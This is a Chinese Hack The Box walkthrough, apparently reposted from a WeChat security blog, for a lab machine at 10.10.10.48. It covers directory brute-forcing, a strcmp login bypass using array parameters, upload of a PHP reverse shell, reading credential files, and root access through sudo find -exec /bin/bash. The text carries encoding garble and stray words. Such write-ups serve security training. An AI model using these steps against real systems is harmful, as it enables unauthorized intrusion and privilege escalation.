文章源自【字节脉搏社区】-字节脉搏实验室 php
做者-whithtml
扫描下方二维码进入社区:python
以后准备长期更新HTB系列,由易到难,开了VIP,全部靶机的思路都会更新,让你们尽量多的学习到挖洞技巧,请你们持续关注我们的微信公众号,字节脉搏实验室。linux
首先扫描开放端口和服务。web
nmap -A -v 10.10.10.48shell
能够看到开放端口是22和80,机器是linux的。浏览器
打开80端口对应的网站应用:安全
先上工具扫一波目录:python3 dirsearch.py -u http://10.10.10.48 -e *bash
gobuster dir -u http://10.10.10.48 -w /usr/share/wordlists/dirb/big.txt服务器
爆破获得有用的目录为:_uploaded login
直接访问:http://10.10.10.48/login/
目录配置错误,能够直接列出。
在登陆文件夹中,咱们能够看到login.php.swp。在Web服务器上就地编辑文件的状况并很多见,若是未适当关闭文件,Nano和Vim等编辑器将建立临时文件。咱们能够下载.swp文件,并查看login.php使用strings命令的源代码。
Web服务器正在使用strcmp来检查用户名和密码,这是不安全的,能够轻松地绕开。让咱们打开burp并捕获登陆请求。如下代码存在问题:
if (strcmp($password, $_POST['password']) == 0) {
if (strcmp($username , $_POST['username']) == 0) {
Burp捕捉登录请求,修改post的参数为:username[]=admin&password[]=admin
顺利登录:
上传kali自带的php shell:/usr/share/webshells/php/php-reverse-shell.php
上传以后没文件路径,加上以前扫描出来的目录,浏览器访问执行,本地监听:http://10.10.10.48/_uploaded/php-reverse-shell.php
看一下web的配置文件:cat /var/www/html/login/config.php
<?php
$username = “admin”;
$password = “thisisaxxxxpassword”;
咱们还能够阅读/etc/passwd以找到用户名john。结合这两个。让咱们升级到pty shell。
python -c 'import pty; pty.spawn(“/bin/bash”)'
su jhon
拿到user.txt
sudo -l
看来咱们能够将find做为sudo 运行。
sudo /usr/bin/find /etc -exec /bin/bash \;
拿到root.txt
刚开始分享一个比较基础的靶机,以后会从慢慢深刻。长期更新,记得追更哦。
通知!
公众号招募文章投稿小伙伴啦!只要你有技术有想法要分享给更多的朋友,就能够参与到咱们的投稿计划当中哦~感兴趣的朋友公众号首页菜单栏点击【商务合做-我要投稿】便可。期待你们的参与~
记得扫码
关注咱们哦
本文分享自微信公众号 - WhITECat安全团队(WhITECat_007)。
若有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一块儿分享。